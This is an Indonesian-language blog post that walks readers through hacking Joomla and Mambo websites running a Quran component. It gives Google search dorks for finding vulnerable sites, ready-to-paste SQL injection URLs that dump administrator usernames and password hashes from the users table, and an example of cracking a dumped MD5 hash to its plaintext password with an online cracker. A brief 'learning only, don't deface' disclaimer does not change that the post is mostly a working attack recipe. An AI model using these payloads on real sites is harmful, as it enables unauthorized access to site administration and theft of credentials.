Saya Posting lagi berita tentang ditemukannya bug SQl website islamy yang berbasis Joomla disini, dan saya berharap bagi anda, terutama bagi anda para administrator website yang memiliki komponen Quran "com_quran" untuk segera berbenah (
memperketat security anda ),
setelah kemarin pagi teman saya dan blok_under9r0und mendapatkan banyak sekali situs yang ternyata memasang komponen tersebut. dan ternyata bug nya terlihat semua.... dan bagi anda yang ingin lihat bugnya, sudah saya poskan di http://md5ku.blogsppot.com ................
Nah barangkali para hadirin ingin mencoba gimana caranya nemuin bug itu ......
disini saya akan sedikit sharinG..... Okey !!!!!
Yang kita butuhkan disini cukup simple aja....
1. Secangkir Kopi / Teh hangat biar gag ngantuk...
2.Gerak-gerakin dulu badannya biar gag pegel depan kompi terus...
3. Buka Browser eNte N ketik www.Google.co.id atau .com juga gag apa2... ^_^
4. Ketik allinurl:"com_quran" atau pake yang ini inurl:"/index.php?option=com_quran"
5. Nah nanti Hasilnya http://{nama situs}/index.php?option=com_quran&action=viewayat&surano=13
6. Masukkan code ini di belakang nama situs tersebut
Maka Username dan Password Admin akan keluar ......
dalam bentuk enkripsi dan perlu di dekrip terlebih dahulu.....
Nah bagaimana cara mengetahui passwordnya...??????
Password yang masih ter-enkrip bisa anda cari di mbah Google.. atau di md5 decrypter.
namun Jika setelah bolak-balik Google anda belum menemukan juga,,, maka
" ANDA BELUM BERHASIL COBA SEKALI LAGI " ... Wkwkwkwkwk...........
Tapi kalau kamu BERHASIL tolong jangan merusak, ataupun mendeface, ataupun mengcrack atau yang lainya deh.... coz ini Hanya belajar aja............ okey....
Sekali lagi ... tolong gunakan tutorial ini sebaik-baiknya...
untuk Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
untuk Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
Jadi Hasilnya...http://nama situs.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
Maka Username dan Password Admin akan keluar ......
dalam bentuk enkripsi dan perlu di dekrip terlebih dahulu.....
contoh : Admin : c7d1a2a30826683fd366e7fd6527e79c
Maka Username = Admin
Password = c7d1a2a30826683fd366e7fd6527e79c
Nah bagaimana cara mengetahui passwordnya...??????
Password yang masih ter-enkrip bisa anda cari di mbah Google.. atau di md5 decrypter.
Nah kalo Hasil dari c7d1a2a30826683fd366e7fd6527e79c saya coba di http://www.md5crack.com/crackmd5.php
Hasilnya : crescent
Jadi usernamenya = admin dan password = crescent
namun Jika setelah bolak-balik Google anda belum menemukan juga,,, maka
" ANDA BELUM BERHASIL COBA SEKALI LAGI " ... Wkwkwkwkwk...........
Tapi kalau kamu BERHASIL tolong jangan merusak, ataupun mendeface, ataupun mengcrack atau yang lainya deh.... coz ini Hanya belajar aja............ okey....
Sekali lagi ... tolong gunakan tutorial ini sebaik-baiknya...
Salam dari saya....
N blok_uNd3r9round
No comments:
Post a Comment